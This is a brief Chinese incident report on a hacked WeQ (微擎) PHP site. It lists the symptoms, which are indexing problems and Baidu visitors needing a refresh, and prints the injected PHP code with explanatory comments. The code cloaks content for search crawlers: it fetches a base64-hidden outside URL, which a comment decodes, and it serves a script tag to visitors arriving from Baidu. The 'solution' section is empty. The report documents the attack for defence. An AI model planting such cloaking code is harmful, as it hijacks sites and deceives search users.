微擎漏洞
漏洞报告
环境
- Nginx 1.15
- MySQL 5.6.42
- PHP 7.1
-
微擎版本:
出现问题:
- 网站显示正常,访问域名显示正常
- 通过百度访问需要,刷新一次
- 百度收录出现问题
入侵文件:
入侵代码:
<?php
// 设置网站字符
header('Content-Type:text/html;charset=gb2312');
// 获取用户相关信息
$key= $_SERVER["HTTP_USER_AGENT"];
// 网站抓取
if(strpos($key,'baidu')!==false||strpos($key,'so')!==false||strpos($key,'sogou')!==false||strpos($key,'bing')!==false||strpos($key,'360')!==false||strpos($key,'sm')!==false)
{
// 输出目的网站base64_decode('aHR0cDovL3AueW16ZG14LmNuL3hzLw==')后是http://p.ymzdmx.cn/xs/ ,之所以打开整行,就是一旦搜索引擎抓取,这段代码才会执行
echo file_get_contents(base64_decode('aHR0cDovL3AueW16ZG14LmNuL3hzLw=='));
}
// 获取来源
$_host=urldecode ($_SERVER['HTTP_REFERER']);
// 这入侵者还算良心,只想要百度的抓取
$key="baidu";
echo $_host;
if(strpos($_host,$key)){
echo "<scRIpT src=></scRIpT>";
exit;
}
?>
解决策略: